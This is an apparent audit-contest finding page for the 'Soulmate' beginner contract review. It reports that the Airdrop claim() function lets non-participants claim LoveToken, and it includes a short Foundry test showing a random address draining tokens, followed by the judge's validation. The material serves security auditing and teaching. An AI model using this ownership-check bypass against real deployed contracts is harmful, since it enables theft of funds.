First Flight #9: Soulmate
First Flight #9
Beginner FriendlyFoundryNFT
100 EXP
View results
Previous Next
Submission Details
Severity: high
Valid

Funds can be drained by non participants

heavenz52

Funds can be drained by non participants

A non participant (someone who is not a soulmate) can claim rewards from airdropContract and be rewarded LoveToken

This happens beccause here in these lines you will find that for unknown users' value will be 0 but the check is not made in the claim function to ensure valid users.

As a result as shown in the below test, a random person can drain funds

// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.23;
import {BaseTest} from "./BaseTest.t.sol";
import {console2} from "forge-std/Test.sol";
import {Soulmate} from "../../src/Soulmate.sol";
contract EvilTests is BaseTest {
/*
The claim() function Airdrop doesn't check that idToCreationTimestamp != 0
As a result a random non participant can drain the funds
*/
function test_AirdopCanBeClaimedByAnyone() public {
address randomPerson = makeAddr("randomPerson");
vm.warp(block.timestamp + 10 days + 1 seconds);
vm.prank(randomPerson);
airdropContract.claim();
assertTrue(loveToken.balanceOf(randomPerson) == 10 ether);
}
}
Updates

Lead Judging Commences

0xnevi Lead Judge over 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

finding-claim-airdrop-without-owning-NFT

High severity, This issue is separated from the flawed `isDivorced()` check presented in issue #168 as even if that is fixed, if ownership is not checked, isDivorced would still default to false and allow bypass to claim airdrops by posing as tokenId 0 in turn resulting in this [important check for token claim is bypassed.](https://github.com/Cyfrin/2024-02-soulmate/blob/b3f9227942ffd5c443ce6bccaa980fea0304c38f/src/Airdrop.sol#L61-L66). #220 is the most comprehensive issue as it correctly recognizes both issues existing within the same function.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.